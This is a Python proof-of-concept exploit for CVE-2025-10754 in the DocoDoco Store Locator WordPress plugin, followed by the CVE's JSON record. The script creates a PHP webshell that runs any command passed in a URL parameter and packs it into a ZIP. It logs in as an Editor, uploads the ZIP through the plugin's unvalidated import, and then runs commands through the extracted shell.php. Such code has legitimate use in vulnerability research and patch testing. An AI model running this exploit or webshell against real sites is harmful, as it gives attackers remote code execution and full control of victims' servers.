CVE-2025-10754

# CVE-2025-10754 PoC - DocoDoco Store Locator Arbitrary File Upload # Exploit: Upload malicious PHP file via ZIP upload functionality import requests import zipfile import io import os TARGET_URL = "http://target-wordpress-site.com" USERNAME = "editor_user" PASSWORD = "editor_password" # Step 1: Create malicious PHP webshell webshell_content = b"""<?php // Webshell for demonstrating RCE if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>""" # Step 2: Create ZIP file containing the webshell def create_malicious_zip(): zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf: # Place PHP shell inside the ZIP with a .php extension zf.writestr("shell.php", webshell_content) zip_buffer.seek(0) return zip_buffer # Step 3: Authenticate to WordPress as Editor session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" # Get login form first (to retrieve any nonce tokens) resp = session.get(login_url) # Submit login credentials login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data, cookies={"wordpress_logged_in_": "test"}) # Step 4: Navigate to the DocoDoco Store Locator ZIP upload page upload_url = f"{TARGET_URL}/wp-admin/admin.php?page=docodoco-store-locator" # Step 5: Upload the malicious ZIP file zip_data = create_malicious_zip() files = { "zip_file": ("exploit.zip", zip_data, "application/zip") } # The plugin endpoint processes ZIP uploads without validating file types inside upload_resp = session.post(upload_url, files=files) # Step 6: Access the uploaded webshell # The shell.php is extracted to a web-accessible directory shell_url = f"{TARGET_URL}/wp-content/uploads/docodoco/shell.php?cmd=id" shell_resp = requests.get(shell_url) if shell_resp.status_code == 200: print(f"[+] RCE successful! Output: {shell_resp.text}") else: print("[-] Exploit failed, check target configuration")

{"cve": {"id": "CVE-2025-10754", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:41.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The DocoDoco Store Locator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the zip upload functionality in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/docodoco-store-locator/tags/1.0.1/includes/Admin/ZIP.php#L187", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/docodoco-store-locator/tags/1.0.1/includes/Admin/ZIP.php#L275", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/14759eb0-455f-4b7d-abab-4e4d89b32bb1?source=cve", "source": "[email protected]"}]}}